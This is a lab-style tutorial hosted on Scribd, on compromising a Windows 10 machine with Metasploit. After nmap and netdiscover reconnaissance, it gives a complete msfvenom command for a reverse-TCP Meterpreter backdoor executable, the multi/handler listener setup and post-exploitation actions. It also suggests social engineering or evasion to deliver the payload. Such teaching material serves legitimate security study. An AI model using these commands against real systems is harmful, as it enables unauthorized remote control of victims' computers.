Scribd
Upload
16 views

WIN10 MetaExplot

Uploaded by

Pow Jr
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
16 views

WIN10 MetaExplot

Uploaded by

Pow Jr
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Window 10 Metasploiting

Documented by : www.linkedin.com/in/saira-cyber83
Windows 10 Exploitation with Metasploit

Hello ! Today in this document I am going to presents a comprehensive exploration


into the realm of Windows 10 exploitation utilizing Meterpreter sessions within the
powerful framework of Metasploit. Through meticulous examination and practical
demonstrations, it delves into the intricate art of leveraging vulnerabilities inherent
in the Windows 10 operating system to establish Meterpreter sessions.

Lets begin the Exploitation.

Tool We Need :
 Window 10
 Kali Linux
 Netdiscover
 Nmap

Steps :
Start your window10 machine and run below command to find the ip address of
your win10 machine.
 Ipconfig .
Now machine is running let do our next step .
We will scan our network for target machine on our kali Linux terminal
For this we will use netdiscover
Netdiscover : is a network scanning tool used to discover devices connected to
a network.

Next step is to open your kali machine and run the below command to find the ip
address of your kali linux machine .
 Ifconfig
Now ping the target machine used to check if a host is reachable on a network and
to measure the round-trip time for data sent between the local machine and the
target host.
 Ping <host ip>

The next thing that I did was to scan the target machine from my attack machine.
Scanning is the process of discovering the open ports on the target machine and the
services running on those ports. This helps to narrow down the attack pattern
against that machine. I used nmap for scanning:

 nmap -A 192.168.184.146

 -A: is used to enable OS detection, version detection, script scanning and


traceroute.
The image above shows the results from the scanning. After you do the scan, you’ll
notice that the target machine has a considerable number of open ports, which
means there are various attack vectors in this machine.

Now using namp --script vuln 192.168.184.146


The command nmap --script vuln runs Nmap with the vuln script category, which
instructs Nmap to execute scripts specifically designed to detect vulnerabilities on
target hosts. When you run this command, Nmap will execute all scripts
categorized under the "vuln" category, which includes scripts aimed at identifying
various types of vulnerabilities in services, applications, and operating systems
running on the target hosts.

Now we done the reconnaissance step our next step is create a malicious payload
now run the below command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.128


LPORT=4444 -f exe -o windowsbackdoor.exe
Let’s break the options down:
• msfvenom: Payload generator.
• -p windows/meterpreter/reverse_tcp: Windows meterpreter reverse TCP
payload.
• LHOST=192.168.184.128: Local host IP.
• LPORT=4444: Local port.
• -f exe: Output format: exe file.
• -o windowsbackdoor.exe: Output file name.

After the creation of payload we have to load this file on to the victim’s machines ,
here the best part is to do social engineering , or you can make your payload fully
undetectable to execute the malicious payload on target machine , as for now I am
performing attack within my network so I transfer this file on target machine and
execute it .

Now Lets start the exploit :


Run the below command in terminal.

 Msfconsole
Now, type the below commands to select a listener and check the required fields
 Use multi/handler
 Show options
 Set lhost <you ip >

 Set payload windows/meterpreter/reverse_tcp

 Run

run the command and then go to the target machine and execute the malicious
payload when you press enter the session will be open .
YES ! here our session is created with the target machine we execute
the payload successfully .
Now we are in window 10 machine .
Now Run the help command which will display information about available
commands and how to use them within a specific context.
For now we are going to run the screenshot command which will take the
screenshot of window10

Also screenshare command : which will share the current screen running on
window10 machine .

Making a remote directory


And in the end I m going to reboot window 10 remotely.

In this way you can run all the commands one by one and take full control of
victims machine .
Conclusion:

In conclusion, this document has provided a comprehensive guide to Windows 10


exploitation using Meterpreter sessions within the Metasploit framework. By
following the outlined steps, one can effectively identify vulnerabilities, generate
and execute payloads, and gain control over target machines. Remember, with great
power comes great responsibility. Always ensure ethical and legal use of these
techniques in your cybersecurity endeavors. Happy hacking!

Thank you .

You might also like